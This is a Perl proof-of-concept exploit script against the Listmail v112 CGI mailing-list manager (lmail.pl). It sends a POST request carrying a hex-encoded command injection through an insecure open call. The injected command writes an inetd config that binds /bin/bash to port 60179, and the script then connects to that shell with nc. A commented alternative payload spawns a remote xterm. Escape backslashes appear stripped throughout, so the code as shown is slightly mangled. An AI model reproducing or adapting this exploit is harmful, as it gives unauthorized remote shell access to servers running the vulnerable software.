#!/usr/bin/perl -w

## Listmail v112 by P.M.Systems / PoC Exploit
##
## Listmail is a powerful, hands-free mailing
## list manager which is exploitable due to an
## insecure open call. This exploit will attempt
## to bind a shell at port 60179/fido by using
## inetd. Code to spawn an xterm is as always 
## included.
##
## http://teleh0r.cjb.net/ || teleh0r@doglover.com

use strict; use Socket;

if (@ARGV < 1) {
    print("Usage: $0 <target>n");
    exit(1);
}

my($target,$length,$cgicode,$agent,$sploit, 
   $iaddr,$paddr,$proto);

$target = $ARGV[0];

print("nRemote host: $targetn");
print("CGI-script: /cgi-bin/lmail.pln");

$agent = "Mozilla/4.0 (compatible; MSIE 5.01; Windows 95)";

# echo 'fido stream tcp nowait nobody /bin/bash bash -i' > /tmp/.hass;
# /usr/sbin/inetd /tmp/.hass

$cgicode =

"x63x66x67x3dx7cx65x63x68x6fx2bx27x66x69".
"x64x6fx2bx73x74x72x65x61x6dx2bx74x63x70".
"x2bx6ex6fx77x61x69x74x2bx6ex6fx62x6fx64".
"x79x2bx2fx62x69x6ex2fx62x61x73x68x2bx62".
"x61x73x68x2bx2dx69x27x2bx3ex2bx2fx74x6d".
"x70x2fx2ex68x61x73x73x3bx2fx75x73x72x2f".
"x73x62x69x6ex2fx69x6ex65x74x64x2bx2fx74".
"x6dx70x2fx2ex68x61x73x73x7c";

# Code to spawn an xterm - exploit would have to be modfied.
# cfg=%7Cxterm+-ut+-display+localhost%3A0%7C

$sploit =
"POST /cgi-bin/lmail.pl HTTP/1.0
Connection: close
User-Agent: $agent
Host: $target
Content-type: application/x-www-form-urlencoded
Content-length: 130

$cgicode";

$iaddr = inet_aton($target)                     || die("Error: $!n");
$paddr = sockaddr_in(80, $iaddr)                || die("Error: $!n");
$proto = getprotobyname('tcp')                  || die("Error: $!n");

socket(SOCKET, PF_INET, SOCK_STREAM, $proto)    || die("Error: $!n");
connect(SOCKET, $paddr)                         || die("Error: $!n");
send(SOCKET,"$sploit1512", 0)               || die("Error: $!n");
close(SOCKET);

print("nSleeping 5 seconds - waiting for the shell ...nn");
sleep(5); system("nc -w 10 $target 60179"); exit(0);


# www.Syue.com [2000-11-17]